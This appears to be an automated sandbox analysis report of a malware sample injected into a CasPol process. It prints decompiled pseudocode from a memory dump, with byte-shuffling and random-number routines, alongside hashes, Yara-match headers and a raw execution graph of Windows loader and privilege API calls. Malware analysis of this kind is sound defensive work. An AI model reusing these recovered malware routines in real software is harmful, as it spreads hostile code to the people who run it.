                                                                                                                                                                                                                                                                                                                            				unsigned int _t80;
                                                                                                                                                                                                                                                                                                                            				unsigned int _t87;
                                                                                                                                                                                                                                                                                                                            				signed int _t91;
                                                                                                                                                                                                                                                                                                                            				signed char _t94;
                                                                                                                                                                                                                                                                                                                            				signed char _t97;
                                                                                                                                                                                                                                                                                                                            				signed char _t100;
                                                                                                                                                                                                                                                                                                                            				unsigned int _t108;
                                                                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                                                                            				_t39 = __eax;
                                                                                                                                                                                                                                                                                                                            				asm("sbb eax, 0x577c1a12");
                                                                                                                                                                                                                                                                                                                            				if(__eflags >= 0) {
                                                                                                                                                                                                                                                                                                                            					_t91 = __eax[0xe] & 0x000000ff;
                                                                                                                                                                                                                                                                                                                            					_t60 = ((__eax[0xc] & 0x000000ff) << 0x00000008 | __eax[0xd] & 0x000000ff) & 0x0000ffff;
                                                                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                                                                            				 *_t39 =  *_t39 + 1;
                                                                                                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t60 - 0x1e)) =  *((intOrPtr*)(_t60 - 0x1e)) + _t39;
                                                                                                                                                                                                                                                                                                                            				asm("loope 0xa");
                                                                                                                                                                                                                                                                                                                            				_t64 = ( &(_t39[_t60]) | _t91) << 0x00000007 | (_t39[0xf] & 0x000000ff) >> 0x00000001;
                                                                                                                                                                                                                                                                                                                            				_t94 = _t39[0xb];
                                                                                                                                                                                                                                                                                                                            				if((_t94 & 0x00000001) != 0) {
                                                                                                                                                                                                                                                                                                                            					_t64 = _t64 | 0x80000000;
                                                                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                                                                            				_t39[0xc] = _t64 >> 0x18;
                                                                                                                                                                                                                                                                                                                            				_t39[0xf] = _t64;
                                                                                                                                                                                                                                                                                                                            				_t39[0xd] = _t64 >> 0x10;
                                                                                                                                                                                                                                                                                                                            				_t72 = ((((_t39[8] & 0x000000ff) << 0x00000008 | _t39[9] & 0x000000ff) & 0x0000ffff) << 0x00000008 | _t39[0xa] & 0xff) << 0x00000007 | (_t94 & 0x000000ff) >> 0x00000001;
                                                                                                                                                                                                                                                                                                                            				_t97 = _t39[7];
                                                                                                                                                                                                                                                                                                                            				_t39[0xe] = _t64 >> 8;
                                                                                                                                                                                                                                                                                                                            				if((_t97 & 0x00000001) != 0) {
                                                                                                                                                                                                                                                                                                                            					_t72 = _t72 | 0x80000000;
                                                                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                                                                            				_t39[8] = _t72 >> 0x18;
                                                                                                                                                                                                                                                                                                                            				_t39[0xb] = _t72;
                                                                                                                                                                                                                                                                                                                            				_t39[9] = _t72 >> 0x10;
                                                                                                                                                                                                                                                                                                                            				_t80 = ((((_t39[4] & 0x000000ff) << 0x00000008 | _t39[5] & 0x000000ff) & 0x0000ffff) << 0x00000008 | _t39[6] & 0xff) << 0x00000007 | (_t97 & 0x000000ff) >> 0x00000001;
                                                                                                                                                                                                                                                                                                                            				_t100 = _t39[3];
                                                                                                                                                                                                                                                                                                                            				_t39[0xa] = _t72 >> 8;
                                                                                                                                                                                                                                                                                                                            				if((_t100 & 0x00000001) != 0) {
                                                                                                                                                                                                                                                                                                                            					_t80 = _t80 | 0x80000000;
                                                                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                                                                            				_t39[4] = _t80 >> 0x18;
                                                                                                                                                                                                                                                                                                                            				_t39[7] = _t80;
                                                                                                                                                                                                                                                                                                                            				_t39[5] = _t80 >> 0x10;
                                                                                                                                                                                                                                                                                                                            				_t87 = (((_t39[1] & 0x000000ff) << 0x00000008 | _t39[2] & 0x000000ff) & 0x00ffffff | ( *_t39 & 0x000000ff) << 0x00000010) << 0x00000007 | (_t100 & 0x000000ff) >> 0x00000001;
                                                                                                                                                                                                                                                                                                                            				 *_t39 = _t87 >> 0x18;
                                                                                                                                                                                                                                                                                                                            				_t39[1] = _t87 >> 0x10;
                                                                                                                                                                                                                                                                                                                            				_t58 = _t80 >> 8;
                                                                                                                                                                                                                                                                                                                            				_t108 = _t87 >> 8;
                                                                                                                                                                                                                                                                                                                            				_t39[6] = _t58;
                                                                                                                                                                                                                                                                                                                            				_t39[2] = _t108;
                                                                                                                                                                                                                                                                                                                            				_t39[3] = _t87;
                                                                                                                                                                                                                                                                                                                            				return _t39;
                                                                                                                                                                                                                                                                                                                            			}
















                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.449154669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                                                            • Opcode ID: defec63538b86a58b481b414b20826ef7e397a4e7b8e4f3801a8f2a95dbf5652
                                                                                                                                                                                                                                                                                                                            • Instruction ID: e6f425d5863dca231ab35ba66d242bcfbf69a6ad0e8344f3b95d00dd7e46202d
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: defec63538b86a58b481b414b20826ef7e397a4e7b8e4f3801a8f2a95dbf5652
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 354182516586F14ED31E436D08B9675AFD18E9720274EC2FEDADA6F2F3C0988408D3A5
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            C-Code - Quality: 96%
                                                                                                                                                                                                                                                                                                                            			E004038C3(signed char* __eax) {
                                                                                                                                                                                                                                                                                                                            				signed char* _t39;
                                                                                                                                                                                                                                                                                                                            				unsigned int _t58;
                                                                                                                                                                                                                                                                                                                            				signed int _t63;
                                                                                                                                                                                                                                                                                                                            				unsigned int _t67;
                                                                                                                                                                                                                                                                                                                            				unsigned int _t75;
                                                                                                                                                                                                                                                                                                                            				unsigned int _t83;
                                                                                                                                                                                                                                                                                                                            				unsigned int _t90;
                                                                                                                                                                                                                                                                                                                            				signed int _t92;
                                                                                                                                                                                                                                                                                                                            				signed char _t95;
                                                                                                                                                                                                                                                                                                                            				signed char _t98;
                                                                                                                                                                                                                                                                                                                            				signed char _t101;
                                                                                                                                                                                                                                                                                                                            				unsigned int _t109;
                                                                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                                                                            				_t39 = __eax;
                                                                                                                                                                                                                                                                                                                            				_t92 = __eax[0xe] & 0x000000ff;
                                                                                                                                                                                                                                                                                                                            				_t63 = ((__eax[0xc] & 0x000000ff) << 0x00000008 | __eax[0xd] & 0x000000ff) & 0x0000ffff;
                                                                                                                                                                                                                                                                                                                            				 *__eax =  *__eax + 1;
                                                                                                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t63 - 0x1e)) =  *((intOrPtr*)(_t63 - 0x1e)) + __eax;
                                                                                                                                                                                                                                                                                                                            				asm("loope 0xa");
                                                                                                                                                                                                                                                                                                                            				_t67 = ( &(__eax[_t63]) | _t92) << 0x00000007 | (__eax[0xf] & 0x000000ff) >> 0x00000001;
                                                                                                                                                                                                                                                                                                                            				_t95 = __eax[0xb];
                                                                                                                                                                                                                                                                                                                            				if((_t95 & 0x00000001) != 0) {
                                                                                                                                                                                                                                                                                                                            					_t67 = _t67 | 0x80000000;
                                                                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                                                                            				_t39[0xc] = _t67 >> 0x18;
                                                                                                                                                                                                                                                                                                                            				_t39[0xf] = _t67;
                                                                                                                                                                                                                                                                                                                            				_t39[0xd] = _t67 >> 0x10;
                                                                                                                                                                                                                                                                                                                            				_t75 = ((((_t39[8] & 0x000000ff) << 0x00000008 | _t39[9] & 0x000000ff) & 0x0000ffff) << 0x00000008 | _t39[0xa] & 0xff) << 0x00000007 | (_t95 & 0x000000ff) >> 0x00000001;
                                                                                                                                                                                                                                                                                                                            				_t98 = _t39[7];
                                                                                                                                                                                                                                                                                                                            				_t39[0xe] = _t67 >> 8;
                                                                                                                                                                                                                                                                                                                            				if((_t98 & 0x00000001) != 0) {
                                                                                                                                                                                                                                                                                                                            					_t75 = _t75 | 0x80000000;
                                                                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                                                                            				_t39[8] = _t75 >> 0x18;
                                                                                                                                                                                                                                                                                                                            				_t39[0xb] = _t75;
                                                                                                                                                                                                                                                                                                                            				_t39[9] = _t75 >> 0x10;
                                                                                                                                                                                                                                                                                                                            				_t83 = ((((_t39[4] & 0x000000ff) << 0x00000008 | _t39[5] & 0x000000ff) & 0x0000ffff) << 0x00000008 | _t39[6] & 0xff) << 0x00000007 | (_t98 & 0x000000ff) >> 0x00000001;
                                                                                                                                                                                                                                                                                                                            				_t101 = _t39[3];
                                                                                                                                                                                                                                                                                                                            				_t39[0xa] = _t75 >> 8;
                                                                                                                                                                                                                                                                                                                            				if((_t101 & 0x00000001) != 0) {
                                                                                                                                                                                                                                                                                                                            					_t83 = _t83 | 0x80000000;
                                                                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                                                                            				_t39[4] = _t83 >> 0x18;
                                                                                                                                                                                                                                                                                                                            				_t39[7] = _t83;
                                                                                                                                                                                                                                                                                                                            				_t39[5] = _t83 >> 0x10;
                                                                                                                                                                                                                                                                                                                            				_t90 = (((_t39[1] & 0x000000ff) << 0x00000008 | _t39[2] & 0x000000ff) & 0x00ffffff | ( *_t39 & 0x000000ff) << 0x00000010) << 0x00000007 | (_t101 & 0x000000ff) >> 0x00000001;
                                                                                                                                                                                                                                                                                                                            				 *_t39 = _t90 >> 0x18;
                                                                                                                                                                                                                                                                                                                            				_t39[1] = _t90 >> 0x10;
                                                                                                                                                                                                                                                                                                                            				_t58 = _t83 >> 8;
                                                                                                                                                                                                                                                                                                                            				_t109 = _t90 >> 8;
                                                                                                                                                                                                                                                                                                                            				_t39[6] = _t58;
                                                                                                                                                                                                                                                                                                                            				_t39[2] = _t109;
                                                                                                                                                                                                                                                                                                                            				_t39[3] = _t90;
                                                                                                                                                                                                                                                                                                                            				return _t39;
                                                                                                                                                                                                                                                                                                                            			}
















                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.449154669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                                                            • Opcode ID: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
                                                                                                                                                                                                                                                                                                                            • Instruction ID: bc00a6d921930c6cb3f4f1338418df8015680d89ccc892f0f78b0b11d2697678
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C53160516586F14ED31E836D08BD675AEC28E9720174EC2FEDADA6F2F3C4988408D3A5
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                                            			E00420673(char* _a4) {
                                                                                                                                                                                                                                                                                                                            				signed int _t30;
                                                                                                                                                                                                                                                                                                                            				signed int _t35;
                                                                                                                                                                                                                                                                                                                            				signed int _t36;
                                                                                                                                                                                                                                                                                                                            				signed int _t55;
                                                                                                                                                                                                                                                                                                                            				intOrPtr _t56;
                                                                                                                                                                                                                                                                                                                            				signed int _t66;
                                                                                                                                                                                                                                                                                                                            				intOrPtr _t67;
                                                                                                                                                                                                                                                                                                                            				char* _t68;
                                                                                                                                                                                                                                                                                                                            				signed int _t78;
                                                                                                                                                                                                                                                                                                                            				signed int _t80;
                                                                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                                                                            				_t68 = _a4;
                                                                                                                                                                                                                                                                                                                            				if(_t68 != 0) {
                                                                                                                                                                                                                                                                                                                            					if( *_t68 == 0) {
                                                                                                                                                                                                                                                                                                                            						_t2 = _t68 + 4; // 0xfffd5885
                                                                                                                                                                                                                                                                                                                            						_t35 =  *_t2;
                                                                                                                                                                                                                                                                                                                            						 *_t68 = 1;
                                                                                                                                                                                                                                                                                                                            						_t56 =  *0x7ffe0018;
                                                                                                                                                                                                                                                                                                                            						_t67 =  *0x7ffe001c;
                                                                                                                                                                                                                                                                                                                            						if(_t35 == 0) {
                                                                                                                                                                                                                                                                                                                            							_t36 =  *0x7ffe0014;
                                                                                                                                                                                                                                                                                                                            							do {
                                                                                                                                                                                                                                                                                                                            							} while (_t56 != _t67);
                                                                                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                                                                                            							_t80 =  *0x7ffe0014;
                                                                                                                                                                                                                                                                                                                            							do {
                                                                                                                                                                                                                                                                                                                            							} while (_t56 != _t67);
                                                                                                                                                                                                                                                                                                                            							_t36 = _t35 * _t80;
                                                                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                                                                            						 *(_t68 + 8) = _t36;
                                                                                                                                                                                                                                                                                                                            						 *(_t68 + 0xc) = 0x492e;
                                                                                                                                                                                                                                                                                                                            						 *(_t68 + 0x10) = 0xed9;
                                                                                                                                                                                                                                                                                                                            						 *(_t68 + 0x14) = 0x35c5;
                                                                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                                                                            					_t7 = _t68 + 8; // 0xfc33bff
                                                                                                                                                                                                                                                                                                                            					_t55 = ( *_t7 << 0x00000012 ^  *_t7 >> 0x00000007) & 0x0007ffff ^  *_t7 << 0x00000012 ^  *_t7 >> 0x0000000d;
                                                                                                                                                                                                                                                                                                                            					_t8 = _t68 + 0xc; // 0x1c084
                                                                                                                                                                                                                                                                                                                            					_t66 = ( *_t8 >> 0x00000019 ^  *_t8 * 0x00000004) & 0x0000001f ^  *_t8 >> 0x0000001b ^ _t20 + _t20 + _t20 + _t20;
                                                                                                                                                                                                                                                                                                                            					_t10 = _t68 + 0x10; // 0xd8e85000
                                                                                                                                                                                                                                                                                                                            					_t23 =  *_t10;
                                                                                                                                                                                                                                                                                                                            					_t11 = _t68 + 0x14; // 0x8b000120
                                                                                                                                                                                                                                                                                                                            					_t78 = ( *_t10 >> 0x00000008 ^  *_t10 << 0x00000007) & 0x000007ff ^  *_t10 >> 0x00000015 ^ _t23 << 0x00000007;
                                                                                                                                                                                                                                                                                                                            					_t12 = _t68 + 0x14; // 0x8b000120
                                                                                                                                                                                                                                                                                                                            					_t13 = _t68 + 0x14; // 0x8b000120
                                                                                                                                                                                                                                                                                                                            					_t30 = ( *_t11 << 0x0000000d ^  *_t11 >> 0x00000009) & 0x000fffff ^  *_t12 >> 0x0000000c ^  *_t13 << 0x0000000d;
                                                                                                                                                                                                                                                                                                                            					 *(_t68 + 0x14) = _t30;
                                                                                                                                                                                                                                                                                                                            					 *(_t68 + 0x10) = _t78;
                                                                                                                                                                                                                                                                                                                            					 *(_t68 + 8) = _t55;
                                                                                                                                                                                                                                                                                                                            					 *(_t68 + 0xc) = _t66;
                                                                                                                                                                                                                                                                                                                            					return (_t30 ^ _t78 ^ _t66 ^ _t55) >> 1;
                                                                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                                                                            			}














                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.449154669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.449154669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            C-Code - Quality: 53%
                                                                                                                                                                                                                                                                                                                            			E00401B8C(signed int __eax, void* __ebx, void* __ecx) {
                                                                                                                                                                                                                                                                                                                            				signed int _t23;
                                                                                                                                                                                                                                                                                                                            				void* _t26;
                                                                                                                                                                                                                                                                                                                            				void* _t88;
                                                                                                                                                                                                                                                                                                                            				void* _t89;
                                                                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                                                                            				_pop(es);
                                                                                                                                                                                                                                                                                                                            				_t26 = __ebx - 1;
                                                                                                                                                                                                                                                                                                                            				 *((intOrPtr*)(__eax + 0x55)) =  *((intOrPtr*)(__eax + 0x55)) + 1;
                                                                                                                                                                                                                                                                                                                            				_t89 = _t88 + 1;
                                                                                                                                                                                                                                                                                                                            				asm("cld");
                                                                                                                                                                                                                                                                                                                            				_t23 = __eax ^ 0x9b1983a2;
                                                                                                                                                                                                                                                                                                                            				if (_t23 <= 0) goto L12;
                                                                                                                                                                                                                                                                                                                            				_push(_t89);
                                                                                                                                                                                                                                                                                                                            			}








                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.449154669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                                                                                                                                            Execution Coverage:7.8%
                                                                                                                                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                                                            Signature Coverage:2.1%
                                                                                                                                                                                                                                                                                                                            Total number of Nodes:1088
                                                                                                                                                                                                                                                                                                                            Total number of Limit Nodes:125
27682->27683 27684 76d221 27683->27684 27685 76d070 LdrLoadDll 27684->27685 27686 76d22d 27685->27686 27687 76d070 LdrLoadDll 27686->27687 27688 76d236 27687->27688 27689 76d070 LdrLoadDll 27688->27689 27690 76d23f 27689->27690 27691 76d070 LdrLoadDll 27690->27691 27692 76d248 27691->27692 27693 76d070 LdrLoadDll 27692->27693 27694 76d251 27693->27694 27695 76d070 LdrLoadDll 27694->27695 27696 76d25a 27695->27696 27697 76d070 LdrLoadDll 27696->27697 27698 76d266 27697->27698 27699 76d070 LdrLoadDll 27698->27699 27700 76d26f 27699->27700 27701 76d070 LdrLoadDll 27700->27701 27702 76d278 27701->27702 27703 76d070 LdrLoadDll 27702->27703 27704 76d281 27703->27704 27705 76d070 LdrLoadDll 27704->27705 27706 76d28a 27705->27706 27707 76d070 LdrLoadDll 27706->27707 27708 76d293 27707->27708 27709 76d070 LdrLoadDll 27708->27709 27710 76d29f 27709->27710 27711 76d070 LdrLoadDll 27710->27711 27712 76d2a8 27711->27712 27713 76d070 LdrLoadDll 27712->27713 27714 76d2b1 27713->27714 27715 76d070 LdrLoadDll 27714->27715 27716 76d2ba 27715->27716 27717 76d070 LdrLoadDll 27716->27717 27718 76d2c3 27717->27718 27719 76d070 LdrLoadDll 27718->27719 27720 76d2cc 27719->27720 27721 76d070 LdrLoadDll 27720->27721 27722 76d2d8 27721->27722 27723 76d070 LdrLoadDll 27722->27723 27724 76d2e1 27723->27724 27725 76d070 LdrLoadDll 27724->27725 27726 76d2ea 27725->27726 27727 76d070 LdrLoadDll 27726->27727 27728 76d2f3 27727->27728 27729 76d070 LdrLoadDll 27728->27729 27730 76d2fc 27729->27730 27731 76d070 LdrLoadDll 27730->27731 27732 76d305 27731->27732 27733 76d070 LdrLoadDll 27732->27733 27734 76d311 27733->27734 27735 76d070 LdrLoadDll 27734->27735 27736 76d31a 27735->27736 27737 76d070 LdrLoadDll 27736->27737 27738 76d323 27737->27738 27739 76d070 LdrLoadDll 27738->27739 27740 76d32c 27739->27740 27741 76d070 LdrLoadDll 27740->27741 27742 76d335 27741->27742 27743 76d070 LdrLoadDll 27742->27743 27744 76d33e 27743->27744 27745 76d070 LdrLoadDll 27744->27745 27746 76d34a 27745->27746 27747 
76d070 LdrLoadDll 27746->27747 27748 76d353 27747->27748 27749 76d070 LdrLoadDll 27748->27749 27750 76d35c 27749->27750 27750->27495 27752 76d3f0 LdrLoadDll 27751->27752 27753 76c2fc 27752->27753 27778 3309860 LdrInitializeThunk 27753->27778 27754 76c313 27754->27497 27756->27492 27758 76f4b6 27757->27758 27759 76f4b0 27757->27759 27760 76e400 LdrLoadDll 27758->27760 27759->27634 27761 76f4dc 27760->27761 27761->27634 27763 766c74 27762->27763 27764 76e320 2 API calls 27762->27764 27763->27653 27764->27763 27765->27639 27767 76f540 27766->27767 27768 76f59d 27767->27768 27769 76e400 LdrLoadDll 27767->27769 27768->27639 27770 76f57a 27769->27770 27771 76e320 2 API calls 27770->27771 27771->27768 27773 76d08b 27772->27773 27774 7677c0 LdrLoadDll 27773->27774 27775 76d0ab 27774->27775 27776 7677c0 LdrLoadDll 27775->27776 27777 76d15f 27775->27777 27776->27777 27777->27674 27777->27777 27778->27754 27780 76d3f0 LdrLoadDll 27779->27780 27781 76caac RtlFreeHeap 27780->27781 27781->27500 27783 757690 27782->27783 27784 75768b 27782->27784 27785 76e2a0 LdrLoadDll 27783->27785 27784->27435 27791 7576b5 27785->27791 27786 757718 27786->27435 27787 76c2e0 2 API calls 27787->27791 27788 75771e 27790 757744 27788->27790 27792 76c9e0 2 API calls 27788->27792 27790->27435 27791->27786 27791->27787 27791->27788 27794 76e2a0 LdrLoadDll 27791->27794 27798 76c9e0 27791->27798 27793 757735 27792->27793 27793->27435 27794->27791 27796 76c9e0 2 API calls 27795->27796 27797 75795e 27796->27797 27797->27392 27799 76d3f0 LdrLoadDll 27798->27799 27800 76c9fc 27799->27800 27803 33096e0 LdrInitializeThunk 27800->27803 27801 76ca13 27801->27791 27803->27801 27805 76da83 27804->27805 27806 75b170 LdrLoadDll 27805->27806 27807 75a00d 27806->27807 27807->27398 27810 75b4e3 27808->27810 27809 75b560 27809->27405 27810->27809 27820 76c0b0 LdrLoadDll 27810->27820 27813 76d3f0 LdrLoadDll 27812->27813 27814 76cc0f LookupPrivilegeValueW 27813->27814 27814->27409 27816 76c69c 27815->27816 27817 76d3f0 
LdrLoadDll 27815->27817 27821 3309910 LdrInitializeThunk 27816->27821 27817->27816 27818 76c6bb 27818->27412 27820->27809 27821->27818 27823 75b667 27822->27823 27824 75b4c0 LdrLoadDll 27823->27824 27825 75b6ca 27824->27825 27825->27351 27827 75b3b4 27826->27827 27872 76c0b0 LdrLoadDll 27827->27872 27829 75b3ee 27829->27353 27831 75e33c 27830->27831 27832 75b640 LdrLoadDll 27831->27832 27833 75e34e 27832->27833 27873 75e1e0 27833->27873 27836 75e381 27838 75e392 27836->27838 27841 76c8b0 2 API calls 27836->27841 27837 75e369 27839 75e374 27837->27839 27840 76c8b0 2 API calls 27837->27840 27838->27357 27839->27357 27840->27839 27841->27838 27843 75c8c6 27842->27843 27844 75c8d0 27842->27844 27843->27366 27845 75b4c0 LdrLoadDll 27844->27845 27846 75c941 27845->27846 27847 75b390 LdrLoadDll 27846->27847 27848 75c955 27847->27848 27849 75c978 27848->27849 27850 75b4c0 LdrLoadDll 27848->27850 27849->27366 27851 75c994 27850->27851 27852 7673b0 9 API calls 27851->27852 27853 75c9e9 27852->27853 27853->27366 27892 75e5d0 27854->27892 27856 759101 27856->27355 27857 758daa 27857->27856 27898 766ce0 27857->27898 27859 76f4a0 LdrLoadDll 27860 758fa2 27859->27860 27862 76f5d0 2 API calls 27860->27862 27861 758e06 27861->27856 27861->27859 27867 758fb7 27862->27867 27863 757680 3 API calls 27863->27867 27867->27856 27867->27863 27868 757940 2 API calls 27867->27868 27901 75c5f0 27867->27901 27951 75e570 27867->27951 27955 75dfd0 27867->27955 27868->27867 27869->27360 27870->27371 27871->27379 27872->27829 27874 75e2b0 27873->27874 27875 75e1fa 27873->27875 27874->27836 27874->27837 27876 75b4c0 LdrLoadDll 27875->27876 27877 75e21c 27876->27877 27883 76c360 27877->27883 27879 75e25e 27886 76c3a0 27879->27886 27882 76c8b0 2 API calls 27882->27874 27884 76d3f0 LdrLoadDll 27883->27884 27885 76c37c 27884->27885 27885->27879 27887 76c3bc 27886->27887 27888 76d3f0 LdrLoadDll 27886->27888 27891 3309fe0 LdrInitializeThunk 27887->27891 27888->27887 27889 75e2a4 27889->27882 27891->27889 
27893 75e5dd 27892->27893 27894 7677c0 LdrLoadDll 27893->27894 27895 75e5f5 27894->27895 27896 75e603 27895->27896 27897 75e5fc SetErrorMode 27895->27897 27896->27857 27897->27896 27969 75e3a0 27898->27969 27900 766d06 27900->27861 27902 75c60f 27901->27902 27903 75c609 27901->27903 27995 759be0 27902->27995 27988 75dcc0 27903->27988 27906 75c61c 27907 75c89b 27906->27907 27908 76f5d0 2 API calls 27906->27908 27907->27867 27909 75c638 27908->27909 27910 75c64c 27909->27910 27911 75e570 2 API calls 27909->27911 28004 76c130 27910->28004 27911->27910 27914 75c776 28011 75c590 LdrLoadDll LdrInitializeThunk 27914->28011 27915 76c320 2 API calls 27916 75c6ca 27915->27916 27916->27914 27921 75c6d6 27916->27921 27918 75c795 27919 75c79d 27918->27919 28012 75c500 LdrLoadDll NtClose LdrInitializeThunk 27918->28012 27923 76c8b0 2 API calls 27919->27923 27921->27907 27922 75c71f 27921->27922 27926 76c430 2 API calls 27921->27926 27924 76c8b0 2 API calls 27922->27924 27927 75c7a7 27923->27927 27928 75c73c 27924->27928 27925 75c7bf 27925->27919 27929 75c7c6 27925->27929 27926->27922 27927->27867 28007 76b790 27928->28007 27931 75c7de 27929->27931 28013 75c480 LdrLoadDll LdrInitializeThunk 27929->28013 28014 76c1b0 LdrLoadDll 27931->28014 27932 75c753 27932->27907 28010 757af0 LdrLoadDll 27932->28010 27935 75c7f2 28015 75c2e0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 27935->28015 27938 75c76c 27938->27867 27939 75c816 27940 75c857 27939->27940 28016 76c1e0 LdrLoadDll 27939->28016 28018 76c240 LdrLoadDll 27940->28018 27943 75c865 27945 76c8b0 2 API calls 27943->27945 27944 75c834 27944->27940 28017 76c270 LdrLoadDll 27944->28017 27946 75c86f 27945->27946 27948 76c8b0 2 API calls 27946->27948 27949 75c879 27948->27949 27949->27907 28019 757af0 LdrLoadDll 27949->28019 27952 75e583 27951->27952 28041 76c2b0 27952->28041 27956 75dfdf 27955->27956 27957 75e00a 27956->27957 28047 75de00 27956->28047 27960 75e049 27957->27960 28067 75dc40 27957->28067 27962 75e078 
